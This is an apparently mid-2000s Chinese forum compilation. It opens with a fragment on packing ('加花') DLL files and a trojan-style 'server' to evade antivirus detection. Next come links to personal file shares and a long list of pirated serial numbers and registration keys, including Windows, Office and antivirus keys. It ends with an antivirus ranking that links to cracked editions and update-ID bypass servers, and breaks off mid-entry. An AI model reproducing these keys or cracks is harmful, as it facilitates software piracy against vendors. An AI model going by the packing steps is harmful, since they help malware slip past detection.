然后将getkey.dll加花文件导入maindll.dll文件,将修改过的maindll.dll文件再加花!

最后将maindll.dll文件导入服务端,进行服务端加花!


几个牛人的网盘

http://wan5718285.ys168.com/

资源齐全，各种都有，且量大，访问量超过74万次
http://mirc.ys168.com/

找系统盘的好地方，其他的也很多
http://free5.ys168.com/?bobo55

宋国母的网盘，不用多介绍了吧？
http://free.ys168.com/?mailsonice

有关超星的资源、软件，爱学习的人的福音。
http://free5.ys168.com/?ssreader

霏凡一个会员发自己原创作品的地方
http://tlyt.12u.cn/

有很多极有特色的小软件
http://free5.ys168.com/?howlove

撒旦

软件序列号、注册号分享
SyGate Home Network v4.0 Build 727－－Name:anything Serial:44D46441-3127CFBA Code:BCF3D581
Sygate Personal Firewall－－序列号为：H1001001
Screen Saver Toolbox v3.3 汉化专业版－－Name:Gmwz.FreeUser SN:755310-15066738
SmartDraw Professional 5.50 正式版－－SN：SD-00-207514-000A-00000-50-45711
Snappy Fax 2000 V2.11.5.1－－Name:Free User Code:8B4D0AF5CFC821E413
S-Spline 2.04－－序列号：314AR-JVC65-JXFVO-VW6NG-PPVVE-4KHIA
Super Tools v1.0－－用户名：www.crackbest.com 密码：gOJnrcmotrpjO r76ZgM
SuperCleaner 2.00－－Name: ReanimatoR^LasH Code:2034-76128-1644-20496
SuperCleaner 2.00 Beta 1－－注册码:1175-43316-941-11662
Super magic 2000(超极兔子魔法设置魔2000)简体中文版－－SN:SM2003-KOP8J3-YJ0YH1-HY5Q45
Swish 1.5 beta 3－－用户名：hanhua.Qzone.com 注册号：CmR9qXxp15zOZbd0mxiqDQxAMkFesGgHqcWitM73XSmUG5K5
Streamline v4.0－－sn:SBW400U7102000-766或者SBW400U7100000-392
Streamline v3.0－－sn:SBW300S1100640-184
数据备份专家2.0－－用户码：121212　注册码：YanZhiYang1998
神奇注册表 0.5版－－用户名：copyyour 注册码：12070019
神奇注册表 0.4版－－用户名：copyyour 注册码：12070019
四通利方中文平台2000(RichWin2000)--SN：PF00-7WLX-0001-0000273或者SN：RNA0-5GXO-0001-0000108
四川省麻将(Kyodai Mahjongg) v15.25－－注册名:http://dyiyd.yeah.net 注册码:002805471661672810617 或者 注册名：Free User 注册码：445237065
T TOP
TurboFTP 2.72(GB)－－Name: TEAM LAXiTY s/n: 48-HZ154ZD-792
TransMac 4.2－－Name:Free User Code:K7E7PAAM6SF2
Trojan Remover 4.3.0－－number:22222 key:875873717
Trojan Remover 4.3.0－－Number:189891 Key:46339488573227112
Trojan Remover 4.2.2－－SN: 12345678 / 376003664581841
Trojan Remover 4.1.7－－Name:[eGIS! &#39;98] Company:UCF/PCE &#39;98 Code:3743079544
TuneSpark.CD.Maker.v1.1.214－－Name:stcsr SN:870648E6044E75E3
Tweaki for Power Users 3.0.12－－sn:YOQNPGTW
TxEdit 4.7－－Name:LwAkUsChI Org:cOoL Code:4015466477
Type manager－－sn:AWW400P0101591-292
听网 1.0－－SN:41EF-2645-04560647
天网防火墙 v2.0.3.102－v2.3通用－－用户名：evrybody 注册号：582f 或者注册名：microke 注册码：3d8f
天音怒放 V2.15－－用户名:fpxfpx 注册码:505-0853-45
天音怒放 V2.14－－Name:www.dyiyd.com SN:443-7672-13
天音怒放 V2.13b－－Name:www.dyiyd.com SN:443-7672-13
天音怒放 V2.13－－注册名：世纪动力 注册码：999-1962-28 或者 注册名：师大附中 注册码：974-8525-71 或者 注册名：RIRI 注册码：632-0390-88
天音怒放2.1修正版－－用户名：www.crackbest.com密码：685-4091-45
U TOP
Ultra Edit V8.00b－－Name:Free User Code:S7N0N-PDE7V-M7Z2I-C1P0R
Ulead Photo Express(我形我速) 4.0 Trial－sn:12903-54000-87045955
Ulead Photo Explorer Pro 7.0 iso－－sn:11103-67000-00262910
Ulead PhotoImpact V6.0 ESD－－sn:11103-06000-00085757
Ulead VideoStudio 5.0正式版－－SN：11102-85000-00015330
Ulead COOL 3D 3.0 简体中文正式版－－SN:12905-03000-00381553
V TOP
Virtual Drive(虚拟光驱) 2001 个人版－－安装序列号:FSX31000000
VRV北信源杀毒专家2001 正式零售版－－序列号:FJDLKICPEAE
VoptMe 6.20－－Name:0000000000 Location:0000000000 Personal Key:CE9391A5GCOBR6F00000或者Name:w Location:[CCG] Code:C7D6623C37O2R16WSMKS
VisualRoute 5.2c－－CLIENT KEY： VISUALROUTE-PWV5C1-5A3245-4A61 SERVER KEY： VISUALROUTE-PWV5S10-FBA833-95E4
VuePrint Pro 7.7b－－Code:11168520
W TOP
文件密使 2.3 注册－－用户名:fpx.yeah.net 注册码:4131484501
网络小吸星 v1.0－－用户名：www.crackbest.com 密码：N89HN4WN3J或者用户名：gfh 注册码：8QT3QT3QZO
五子棋大战－－注册码: g216lab031b5xup376
我的保险箱－－用户名：gfh 邮箱：sxcgfh@sina.com 注册码：346356413166221
我形我素 4.0－－sn:12903-54000-87045955
WPS Office 金山办公组合(企业版)－－SN:KSW026-110000-428123-807600
Wps2000序列号－－KSW00-13328-76201 或者 KSW00-42712-80739
WPS2000万能序列号－－KSW00-00000-00000
WinISO 4.0.0.103 注册码－－Name:fixdown Code:9988c3cad629cd2d0000006b00000000
WinISO V3.9.0.100正式版注册码－－user:winiso sn: 998814fe1ad423ec0000005f00000000或者Name:Free User Code:9988be39150d1ffa0000006d00000000
WinISO 3.X通用注册码--Name:Free User Code:9988be39150d1ffa0000006d00000000
Winmsg 消息精灵3.13 v3.13.3649－－用户名：白菜乐园 注册码：58-F0-89-58-06-53-53-2A
Winmsg 消息精灵3.00 v3.12.3472－－注册名：www.dyiyd.com 注册码：09-2B-79-43-B5-1E-24-0C
WinImage V5.00.5009 Beta－－Name:CrazyKnight [ORiON] CN:E3744D08或者Name:The Netmech^LasH Regcode: 44C66A34
WinImage V5.00.5007－－Name:John Hunt sn:122CA601
Windows Power Tools 3.15－－Code:B8X687-ND98Y-NDKG6-PMVH8
Windows Power Tools 2.85－－Code:b87d789wnfijwefh87eyf87h
Windows进程管理(Process Manager) v3.0.1－－注册名：Nicsoft 注册码：11064 或者 name:sunfeng SN:EG12376
Windows进程管理(Process Manager) v3.0－－name:dyiyd [CCG] code:CCG15688
Wild type－－sn:FHW251R31003373
WinImp 1.21－－Name:IMP Key1:3E8FC381 Key2:6884663C
WinZip 8.1 beta Build 4180－－Name:x SN:00020000或者Name:cTRLd SN:1D4C036C
Winzip v8.0 build3105－－注册名:among 注册码：514A0431 或者 注册名:wang qiang 注册码:c97b0c33 或者 注册名:ldr 注册码：77940148或者name:wangds code:529c0641
WinZip v7.0 SR-1－－注册码:Name:The Krazy Nomad [DEViANT] sn:0BB3629F
WinDVD v2.3 DTS ISO－－sn:4432GHT7C7R84E0
万能五笔2000+通用注册码－－用户名：shenwei168 PASSWORD: 2546781324578124(可以是十六个任意数字）
万能五笔注册码－－用户名：cniti 用户码：3821-076433-0764
WebZip 4.1.0.657－－Name:among s/n:1981862877 Key:A7BB94087900
WebZip 4.1.0.654－－Name:among s/n:1981862877 Key:A7BB94087900
WebZip 4.10 Build 624－－Name:among Seria Numberl:1981862877 Reg Key:A7BB94087900
WebZip 4.00版本通用注册码－－name:among Seria Numberl:1981862877 Reg Key:A7BB94087900 或者 name:1key serial:love1key code:6ED1140C1600 或者 姓名：sNoOFy [AmoK] 序列号：nICE tO sEE yOU! 注册码：A8EF3C7C1A00
WinGate 4.4.0(0728)－－Name：oDDiTy PHEAR Code:666CA61E5DDB490FE6D07C12
Wingate Pro v4.40－－name: oDDiTy PHEAR key: 666CA61E5DDB490FE6D07C12 或者name: ODDITY BASTARD key: CA160578A130655A442D34F9
WinGate 4.4 Beta A－－用户名： MFD Corp. 注册码：36BF3E69EEAEE1E83E36132E或者NameDDiTy PHEAR s/n:666CA61E008F4E0F86D07C12
WinGate vx.x－－Name: United Cracking Force - QT sn:419764B050C2EF1DD21CAB12
WinGate v4.3－－Name:Boy SN:AE5F56E5D95781E99FCEA546 或者 Name: DFA OWNZ SN:666CA61E008F4E0F86D07C12
WinGate V4.2－－Name:MFD Corp.sn:36BF3E69EEAEE1E83E36132E
WinRescue 98 5.04－－注册：Code:SvetCHRISTA
WinRescue 95 V10.04－－注册:msR3I8aUi9y2E84L
WinRescue Me 1.04－－注册：Code:myONEthing
WinRescue 2000 2.04－－注册：Code:NashBOGvseMogyshee
WinRescue NT V2.04－－Code:IBNTB-IMN4KJO
WinRescue 98 V5.03－－Code:SvetCHRISTA
WinRescue 95 V10.03－－Code:msR3I8aUi9y2E84L
WinRescue Me 1.03－－Code:myONEthing
WinRescue 2K V2.03－－Code:NashBOGvseMogyshee
WinRescue NT V2.03－－Code:IBNTB-IMN4KJO
WindowsXP可以无限次激活的号码:CXGDD-GP2B2-RKWWD-HG3HY-VDJ7J或者RK7J8-2PGYQ-P47VV-V6PMB-F6XPQ
WindowsXP 2520 Pro 英文版－－60天免激活序列号：RK7J8-2PGYQ-P47VV-V6PMB-F6XPQ
Windows XP 2505 RC1－－序列号：DTWB2-VX8WY-FG8R3-X696T-66Y46 Q3R8Y-MP9KD-3M6KB-383YB-7PK9Q 411Y0-URB45-34R3B-310N6-70U51 F0R6R-347JU-57IC3-M0V34-11Z16 50M38-0DY53-7UPU5-7H380-M8111
WindowXP(windows whistler) Beta2 build 2428－－CD Key: RBDC9-VTRC8-D7972-J97JY-PRVMG
Windows Mellinium(Windows Me)简体中文最终正式版－－s/n: B6BYC-6T7C3-4PXRW-2XKWB-GYV33
Windows2000 Professional 中文版－－SN：PQHKR-G4JFW-VTY3P-G4WQ2-88CTW
Windows2000 Professional英文正式版－－s/n: RBDC9-VTRC8-D7972-J97JY-PRVMG
Windows2000 Server 简体中文完全正式版－－S/N:XF7DK-7X2WM-2QRCT-Y9R23-4BHDG
Windows2000 Server－－CD-KEY:H6TWQ-TQQM8-HXJYG-D69F7-R84VM
Windows 98 SE 标准正式版－－s/n: HMTWJ-VPPWP-9BXP8-WD73Y-GGT6M
Windows98序列号－－K4HVD-Q9TJ9-6CRX9-C9G68-RQ2D3
X TOP
熊猫钛金零售版Panda Antivirus Titanium－－name:U38V92LK3H password:2a16sd7xekx79
熊猫卫士白金版Panda Antivirus Platinum－－注册号:4nzdcdpb6j5
熊猫卫士白金版Panda Antivirus Platinum 6.30－－Code:4nzdcdpb6j5
虚拟光驱(Virtual Drive) 2001 个人版－－安装序列号:FSX31000000
现在就打字1.2注册号－－ 姓名：www.crackbest.com 密码：105277772612
下载软件管理盒(FlashSoft) V1.06－－用户名：www.crackbest.com 注册码：873359396
Y TOP
鹦鹉螺网络助手(Nautilus NetKit)v2.20中文版－－Name:husoft Code:rkdwpibung 或者 Name:nicsoft code:mfyrkdwpib
鹦鹉螺网络助手(Nautilus NetKit)v2.11中文版－－注册名：dyiyd [CCG] 注册码exqjcvohat
友情强档 5.82.0999(08.01)－－Name:getfox SN:172392-EIVJYH
友情强档5.82.999国际版－－Name:getfox SN:172392-EIVJYH
友情强档5.80.978国际版－－Name:getfox SN:172392-EIVJYH
友情强档 V5.63国际版－－Name:wind[CCG] SN:196350-XIEVVQVIR
音画时尚（ICE Player） v2.6－－注册码:PL68A-yhss-style-98566-55860或者6615-FCJX-LDgs-155868-ice260a
音画时尚（ICE Player） v2.18－－注册码:TD98c-00ip-Q65Z-4129C-8521 或者 fyal-WMCZ-LDco-slyy-ice218
音乐贝贝(CDOK)－－姓名：洋白菜 公司：www.crackbest.com Email:yang119@crackbest.com sn:CA9C8419 或者注册名：copyyour 公司：CCG 信箱:cncrack@963.net 注册码：7E868430
Z TOP
桌面放大镜注册码－－用户名：gfh 注册码：i26hZ73e
中文版拼图游戏1.0－－注册码:ffrjj_196418
中华压缩(ChinaZip) 6.02－－用户名：www.crackbest.com 注册码：AKEM9752
自然画笔(Painter) 6.0－－SN:PF60WRZ-0015375-WRB
智能陈桥五笔5.03正式版－－注册信息码:CCJXQ7X5S
智能狂拼II正式版－－序列号:350－00161634365653
智能狂拼完全正式版－－sn:300-812522036449
中文之星 2001－－SN:310-121964037443
0-9 TOP
32-bit FTP f9.31.1－－Name:stcs Code:3033353B3539
32-bit FTP f9.28.01--Name:FTP Code:30323B373D3B
32-bit FTP f9.26.15--Name:FTP Code:30323B373D3B
32-bit Fax x9.31.1－－Name:stcsr Code:3034323B3738
32-bit Fax x9.28.01--Name:CZY Code:3033373C383A
3DS MAX R4 最终零售版软件预安装密码为－－cdkey:226-19791979 & key:XLSQBQ
3DS MAX 3.1－－Serial: 110-12345678 CDKey: S4ED6W Authorization Code: a8498381
3D Morfit 3D WorldBuilder v3.9--SN:M-2000-MVR-1737
光驱精灵.NET 注册码：8158KJTH63AW
→写作投稿宝典 WriteBook v2.0 用户名：www.cracknow.com 注册码：ugxbcCzfreuvcXvf
→ImageForge Pro v2.92 Serial: FM0622031525362
→Copernic 2001 v5.0 Serial: 7336-791157997
→Real2Virtual Modeller v2.02 Name:1key.126.com sn:M2CW94306
→PolyView v3.56 Name:1key.126.com sn:3711381565
→Map Worksheet Factory v1.00.2 Name:1key.126.com sn:RCXCzsv
→Magic Button v2.05 Name:1key.126.com sn:RCXCzsv
→极速火龙CD压缩器 v1.2 Name:yuki Code:UV8B8ACS9IPYOLKA57DX
→Microsoft Office xp Professional SN:FM9FY-TMF7Q-KCKCT-V9T29-TBBBG
→Serv-U FTP Server 3.0.0.17专业版 正式注册码
SN:6dYwuCzKYyiSYQm0Hlp0OmDivgW8pyx
AM2ZMLSpgg9Ywu+psehNIYwi0Ex4bTweO33a
c5V4vRxJZXk8MhblFzGyrF1z1DWbWfzZaVAWW
→找别扭 v4.0 Name:xiaolou SN:33225T2o5DvzvLH
→应收应付款管理 V1.0 注册码 注册码:80241029
→商务之星 v1.0 下载注册表文件
→五子棋大战 v2.16.127 注册码:g216lab031b5xup376
→MultiNetwork Manager v6.0 Name:1key.126.com lisence:031381-1key.126.com sn:326231-3932
→鹦鹉螺网络助手 用户名fpx[CCG] 注册码vohatmfyrk
→网络搜索软件HostSeek1.1中文版 用户名fpx[CCG] 注册码6BA0-1380-5B03-3801
→慧琪网通计费5.2.0.1 注册名:gd1@yeah.net 用户编号guodong 注册码BH7RBg7r
→Snappy Fax 2000 Name: Free User s/n: 8B4D0AF5CFC821E413
→CD Box Labeler Pro 1.6.1.851 用户名：CrackerABC[BCG] 注册码：GPS-430426-703238
→Bullet Proof FTP v2.3 下载注册机（算了一个注册码，好象无法使用，试试EGIS的注册机）
→一拖即存3.6 注册码：ST-0791-8E3T01187-CCD
→Tweak Me 1.2.2 s/n: 1-Z545136128-1128382-433
→Microsoft Outlook 2002 s/n: dy6wq-d3fyg-v89by-8kpg9-8yw9m
→魔装网神2001 v2.90 Name:LiuJianYing Code:3145374 或 Name:1key.126.com Code:6423571
→魔装网神2001 v2.8 用户名：LiuJianYing 注册码：3145374
→Real格式文件压缩至尊 v1.40 TianYusoftware is good
→HTML (Un)Compress v6.11 Name:1key.126.com sn:fy0B3ngz
→Exe Protect 1.0 Name: CrackerABC[BCG] Code:$C34892C2
→现在就打字 用户名：现在就打字 注册码：175652125032
→EmEditor 3.14 SN:1710-6480-9217-5957 原版下载
→Net Optimizer v3.0 sn:28031979-ph-17081945 原版下载
→Irfan View32 v3.35 Name:1key.126.com sn:467886008
→Snag-It v5.20 Name:1key.126.com company:1key sn:CC73D1DBCD4D5924
→VisualRoute 5.2c SN:F92C46F0-V5P87-71C71CE9-DE6 原版下载
→GoldWave 4.24 Name:FREESOFT Last Name:FREESOFT Code:GELUUWB 原版下载
→伏羲服装鞋业购销存注册码 （3.01版本）用户名：CrackerABC[BCG]
注册码：67206-51065-65042-60186-30376
（3.01版本）用户名：CrackerABC[BCG]
注册码：56238-53314-54999-64919-50083
（3.01版本）用户名：CrackerABC[BCG]
注册码：73071-41361-63517-43840-46932
→Windows Power Tools 2.85 Code:b87d789wnfijwefh87eyf87h 原版下载
→MP3 Converter v2.17 Name:1key.126.com sn:5573200811567025574
→Snappy Fax 2000 V2.11.5.1 Name:Free User Code:8B4D0AF5CFC821E413
→AltoMP3 Maker 2.2 Name:Free User SN:1LfDE2UKh1F5i9fC 原版下载
→Eudora Pro 5.1 First Name:Free Last Name:User Code:49389945-64998697 原版下载
→ReadBook 1.43增强版 Name:1key.126.com sn:2531612613
→Winmsg 消息精灵 v3.0 注册名：www.dyiyd.com
注册码：09-2B-79-43-B5-1E-24-0C
→GetRight v4.5 Beta 4 SN:941829970387
→MusicMatch Jukebox 6.00.4044a SN:WRJWH-9394G-7W7QH-A2G7R
→Private Pix 2.11 name: 1key.126.com code: d32B3r134r335 或
name: copyyour code: 097ACDA020
→听网 1.0 序列号：41EF-2645-04560647
→Opera 5.10 Code:w-EeiCL-QyJFS-3mYfc-rFzFh-NMFWk
→Windows 进程管理大师 v3.0.1 Name: 中华破解联盟 sn:á37888
→登陆奇兵 v3.01测试版 Name:FanWaiDi Code:PI346RNY542Y
→软件管理专家 (flashsoft) 注册名：dyiyd [CCG] 注册码：1639517796 原版下载
→魔装网神2001 v2.7 Name:dyiyd SN:17E4CBD
→RegRun II v2.91 Name:1key email:caozcool@21cn.com sn:1017479
→Real 格式文件压缩至尊V1.3 注册码:TianYusoftware is good
→RegRun II 2.91 Name:1key email:caozcool@21cn.com sn:253271
→windows优化大师通用注册码 注册机码下载
→CuteFtp通用注册文件 Name:1key.126.com custom:1key sn:AY6RP7E6V9DX37
→OICQ 图形留言系统 v3.5 注册名：dyiyd [CCG] 注册码：1538053898
→Fast Browser v3.3 PRO serial:fb0027614094 code:636638490477400385336255
→ftpNetDrive v4.10 sn:04-050-095-28764
→开心斗地主1.5(S9) Name:飞碟网络 SN:http://ufocn.coc.cc 软件下载
→欧阳网络客户管家 v2.0注册码 注册码：4080340240803402
→WinDVD2000 v2.4 OEM国际版 sn: NJZB3VEIWTK6RGT
→轻松试卷单机版 v4.04 用户名：NicSoft
注册码：OUUEQ-NQQWCOTK
→财务专家2001注册码 SN:NDOE77OEKTP
→魔装网神2001 v2.6 Name:CHINA
S/n:166B031
→Panda Antivirus Platinum 6.23 （熊猫卫士） Code:4nzdcdpb6j5 完全版下载
→开心斗地主1.5(S6) Name:测试用户 SN:AL5078BYCT
→CuteFTP V4.2.3 注册文件下载
→OICQ图形留言系统3.20 Name:1key Code:50466173

Real格式文件压缩至尊 1.5 注册：注册名:HOT 注册码:21450-7650 网友点播
魔装网神 2001 3.2 注册：Name:TangKaiYu BCG Code:3BB490A

瑞星杀毒软件2002 在线升级ID：SACIDPJG
Teleport Pro 1.29.1632 注册：Name:Oups the Cracker s/n:1792858292

QQ密码侦探终结者 注册：用户名:tulip 注册码:VnNhWEE9YVd4dmRtVk

超级兔子注册表优化 4.62 注册：Name:NYDoll[CCG] Code:CCG-YVCGRSTHKJK

MP3 CD Maker 1.50 注册：name:Michael sn:1431359145
电脑幽灵(pcGhost) 4.10 注册码：xf[bcg]-123243253244253147014
极速登录 3.1 注册：name:fish sn:8824074

中华压缩(ChinaZip) 7.0 注册：用户名:TonyLiang 注册码:AG5104
BootManager BOOTSTAR 7.25 注册：N:UNREGISTERED! C:BM1-E3BDN-ED81U-BB7D

RegRun II 2.96 Name:[Xorolc] E-mail:Xorolc@hotmail.com Code:49280
光驱精灵 1.35 注册：注册名:copyyour 注册码:rephrdszoumbrvop

文件密使 2.3 注册：用户名:fpx.yeah.net 注册码:4131484501
Windows Power Tools 3.75 注册：Code:B8X687-ND98Y-NDKG6-PMVH8

魔法转换 2.0 Beta 1 注册：注册名:fpx[CCG] 注册码:4EC3252670BC

超级兔子魔法设置 3.91 注册：Name:MINBIN[CCG] Code:CXMS-AWGNKBVCDEB

ZoneAlarm Pro 2.6.231 注册：sn:aee0n-115r2-pnu58-4nep70-t962g0
友情强档 6.0 注册：姓名:guodong 注册码:191094-VEVXLLL

撒旦

十二款世界顶级杀毒软件下载---有序列号全可免费升级
2006年世界顶级杀毒软件排名
金奖：BitDefender
银奖：Kaspersky
铜奖：F-Secure Anti-Virus
第四名： PC-cillin
第五名： ESET Nod32
第六名： McAfee VirusScan
第七名： Norton AntiVirus
第八名： AVG Anti-Virus
第九名： eTrust EZ Antivirus
第十名： Norman Virus Control
第十一名：AntiVirusKi
第十二名：AVAST
这里是排名的国外网站，各种功能、价格、获奖等非常详细，看懂英文要好啊！
http://anti-virus-software-review.toptenreviews.com

排名第一的BitDefender
简介：BitDefender杀毒软件是来自罗马尼亚的老牌杀毒软件，二十四万超大病毒库，它将为你的计算机提供最大的保护，具有功能强大的反病毒引擎以及互联网过滤技术，为你提供即时信息保护功能，通过回答几个简单的问题，你就可以方便的进行安装，并且支持在线升级。它包括 1.永久的防病毒保护；2.后台扫描与网络防火墙；3.保密控制；4.自动快速升级模块；5.创建计划任务；6.病毒隔离区。

排名第一的BitDefender专业版下载地址，最高版本，有汉化，有算号器，17M速度不错啊。
http://soft.mumayi.net/Software/Catalog101/2615.html
http://www.orsoon.com/Software/Catalog179/6484.html
SN：82E04-6AFBA-1DA94-7B539

排名第二的Kaspersky
简介：Kaspersky（卡巴斯基）杀毒软件来源于俄罗斯，是世界上最优秀、最顶级的网络杀毒软件，查杀病毒性能远高于同类产品。卡巴斯基杀毒软件具有超强的中心管理和杀毒能力，能真正实现带毒杀毒！提供了一个广泛的抗病毒解决方案。它提供了所有类型的抗病毒防护：抗病毒扫描仪、监控器、行为阻段、完全检验、E-mail通路和防火墙。它支持几乎是所有的普通操作系统。卡巴斯基控制所有可能的病毒进入端口，它强大的功能和局部灵活性以及网络管理工具为自动信息搜索、安装和病毒防护控制提供最大的便利和最少的时间来建构你的抗病毒分离墙。卡巴斯基抗病毒软件有许多国际研究机构、中立测试实验室和IT出版机构的证书，确认了卡巴斯基具有汇集行业最高水准的突出品质。
卡巴斯基反病毒软件6.0.300个人版官方中文版 一年免费升级
http://51ct.cn/downinfo/1848.html
http://www.xxjp.org/Software/Catalog21/2832.html
http://www.orsoon.com/Software/Catalog179/2024.html
http://green.crsky.com/soft/983.html

排名第三的F-Secure AntiVirus
简介：来自Linux的故乡芬兰的杀毒软件，集合AVP,LIBRA,ORION,DRACO四套杀毒引擎,其中一个就是Kaspersky的杀毒内核，而且青出于蓝胜于蓝，个人感觉杀毒效率比Kaspersky要好，该软件采用分布式防火墙技术，对网络流行病毒尤其有效。在《PC Utilites》评测中超过Kaspersky名列第一，但后来Kaspersky增加了扩展病毒库，反超F-secure。鉴于普通用户用不到扩展病毒库，因此F-secure还是普通用户很不错的一个选择。F-Secure AntiVirus是一款功能强大的实时病毒监测和防护系统，支持所有的 Windows 平台，它集成了多个病毒监测引擎，如果其中一个发生遗漏，就会有另一个去监测。可单一扫描硬盘或是一个文件夹或文件，软件更提供密码的保护性，并提供病毒的信息。
F-Secure AntiVirus6.01
http://www.naf.com.cn/soft/98930.htm
F-Secure AntiVirus Client Security v5.56 特别版
http://www.yesadmin.com/Soft/html/32/198/yesadmin_14873.html
name:www.chinaz.com
sn:0QQC-KJ2D-D663-7XC7-P5U7

第四的Pc-Cillin（趋势）
简介：趋势科技网络安全个人版集成了包括个人防火墙、防病毒、防LJ邮件等功能于一体，最大限度地提供对桌面机的保护并不需要用户进行过多的操作。在用户日常使用及上网浏览时，进行“实时的安全防御监控”；内置的防火墙不仅更方便您使用因地制宜的设定，“专业主控式个人防火墙”及“木马程序损害清除还原技术”的双重保障还可以拒绝各类黑客程序对计算机的访问请求；趋势科技全新研发的病毒阻隔技术，包含“主动式防毒应变系统”以及“病毒扫瞄逻辑分析技术”不仅能够精准侦测病毒藏匿与化身并予以彻底清除外，还能针对特定变种病毒进行封锁与阻隔，让病毒再无可趁之机；强有力的“LJ邮件过滤功能”为您全面封锁不请自来的LJ邮件。趋势科技网络安全个人版的诸多功能确保您的电脑系统运作正常，从此摆脱病毒感染的恶梦。
PC-cillin 2006 网络安全版Sn：PGEF-0017-4168-1475-0999
http://www.crsky.com/soft/655.html

第五名的ESET Nod32
简介：国外很权威的防病毒软件评测给了NOD32很高的分数，在全球共获得超过40多个奖项，包括Virus Bulletin、PC Magazine、ICSA、Checkmark认证等，更加是全球唯一通过26次VB100%测试的防毒软件，高据众产品之榜首！产品线很长，从DOS、Windows 9x/Me、Windows NT/XP/2000，到Novell Netware Server、Linux、BSD等，都有提供。可以对邮件进行实时监测，占用内存资源较少，清除病毒的速度效果都令人满意。
NOD32 Administrator v2.51.22 简体中文封装特别版
http://www.orsoon.com/Software/Catalog179/5243.html
NOD32官方简体中文版v2.51.22管理员版+无限升级补丁FIX2.1
http://51ct.cn/downinfo/555.html
NOD32 Antivirus V2.51.8 完美汉化特别版 免ID永久升级
http://www.orsoon.com/Software/Catalog179/4123.html
NOD32升级ID更新地址:
http://rav.xxjp.org/nod32
http://a9z1.zj.com/（推荐）
http://nod32info.vicp.net/(推荐)
设置方法：更新→更新→设定→位置→服务器→新增→新服务器＋输入升级地址→确定→确定。

第六名的McAfee Virusscan
简介：全球最畅销的杀毒软件之一，McAfee防毒软件，除了操作介面更新外，也将该公司的WebScanX功能合在一起，增加了许多新功能！除了帮你侦测和清除病毒，它还有VShield自动监视系统，会常驻在System Tray，当你从磁盘、网络上、E-mail夹文件中开启文件时便会自动侦测文件的安全性，若文件内含病毒，便会立即警告，并作适当的处理，而且支持鼠标右键的快速选单功能，并可使用密码将个人的设定锁住让别人无法乱改你的设定。
McAfee VirusScan 8.0i With Patch 13 简体中文企业版 （2006-7-20中文优化版）
(虽然有了新的版本MCfee 10.0以上但还是觉得这个版本是最好的简单实用)
http://www.okget.com/Soft/Soft_185.html
http://www.orsoon.com/Software/Catalog179/1453.html
McAfee2006┊极品个人安全组合套装┊官方无限制简体中文版
http://green.crsky.com/soft/2816.html
http://www.down911.com/SoftView/SoftView_2071.html

第七名的Norton AntiVirus
简介：Norton AntiVirus是一套强而有力的防毒软件，它可帮你侦测上万种已知和未知的病毒，并且每当开机时，自动防护便会常驻在System Tray，当你从磁盘、网路上、E-mail 夹档中开启档案时便会自动侦测档案的安全性，若档案内含病毒，便会立即警告，并作适当的处理。另外它还附有“LiveUpdate”的功能，可帮你自动连上 Symantec 的 FTP Server 下载最新的病毒码，於下载完后自动完成安装更新的动作。
诺顿杀毒软件简体中文黄金企业版本10.01.100为企业版本 无需要注册
http://www.orsoon.com/Software/Catalog179/5520.html
Norton AntiVirus (诺顿杀毒)10.0.2.2000.Final 简体中文企业版
http://www.orsoon.com/Software/Catalog179/1525.html

第八名的AVG Anti-Virus
简介：AVG Anti-Virus欧洲有名的杀毒软件，AVG Anti-Virus System功能上相当完整，可即时对任何存取文件侦测，防止电脑病毒感染；可对电子邮件和附加文件进行扫瞄，防止电脑病毒透过电子邮件和附加文件传播；“病毒资料库”里面则记录了一些电脑病毒的特性和发作日期等相关资讯；“开机保护”可在电脑开机时侦测开机型病毒，防止开机型病毒感染。在扫毒方面，可扫瞄磁碟片、硬盘、光盘机外，也可对网络磁碟进行扫瞄。在扫瞄时也可只对磁碟片、硬盘、光盘机上的某个目录进行扫瞄。可扫瞄文件型病毒、巨集病毒、压缩文件（支持ZIP，ARJ，RAR等压缩文件即时解压缩扫描）。在扫瞄时如发现文件感染病毒时会将感染病毒的文件隔离至AVG Virus VauIt，待扫瞄完成后在一并解毒。支持在线升级。现在提供了最新的免费版供大家使用，安装之前先去官方网站填个表，从回信中得到一个序列号。AVG Anti-Virus 有三个版本（专业、服务器、免费），其中有个人非营利使用的免费版本，功能完整，但是仅某部份功能是无法设定的，例如扫毒排程只能每天一次等等。
AVG anti-virusSHI 家庭用户的免费下载地址
http://free.grisoft.cz/softw/70free/setup/avg71free_375a716.exe
AVG Anti-Virus v7.1.394a763 Free 下载地址
http://down1.tech.sina.com.cn/do ... 04-03-16/5083.shtml
http://www.crsky.com/soft/7640.html
AVG Anti-Virus with Firewall V7.1.362a656下载地址
http://www.bizdown.net/soft/16523.html

第九名的eTrust EZ AntiVirus
简介：反病毒软件“eTrust EZ Antivirus”已经获得了国际计算机安全协会（ICSA：International Computer Security Association）的认证。ICSA专门负责检测和认证产品对来自病毒及恶意代码的攻击的有效性。CA公司表示，在ICSA的测试中，eTrust EZ Antivirus软件甚至连“In-The-Wild”恶性病毒也可以100％地检测出来。eTrust EZ Antivirus是一种主要为中小型企业及SOHO用户提供解决方案的反病毒软件。该产品支持的操作系统包括Windows 98、Windows ME、Windows NT以及Windows 2000 Professional等。除此以外，CA公司还提供包括eTrust EZ Antivirus在内的反病毒解决方案组件“eTrust EZ Armor”。 新版本采用全新用户界面，更加易于使用；新的文件隔离功能可有效防止系统文件被误删；改进了帮助系统；增强了“闪动”系统托盘图标功能。
eTrust EZ Antivirus 7.1.6.0 简体中文版
http://www.joyopc.cn/soft/15/2006/20060412883.html
http://www.xiazai.cc/software/8969.html
License Key: XMLTY-ECYXL-XJRIH-RIGEC

第十名的Norman Virus Control
简介：Norman Virus Control是欧洲名牌杀毒软件，为了确保您的计算机系统得到最好的保护，Norman 数据安全系统提供了多种防毒工具供您选择，以满足您的不同需要。此产品结合了先进的病毒扫描引擎、启发式分析技术以及宏验证技术，可有效查杀已知和未知病毒。NVC 可以查杀所有类型的病毒，包括文件和引导扇区病毒而无需使用杀毒软件重新启动开机。
Norman Virus Control 破解版|破解补丁|注册码|注册机|免费下载
http://www.qddown.com/bbs/2-543/
http://www.yesky.com/imagesnew/software/img/2006-1/001/790.html
http://download.enet.com.cn/speed/toftp.php?fname=030202004053101
Key:F8YACF2QNUX3TFDEKV9WWXC8E

第十一名的AntiVirusKit
AntiVirusKit 2006 v16.0.7. 0，是德国G-Data公司产品，英文全名是GData AntiVirusKit，
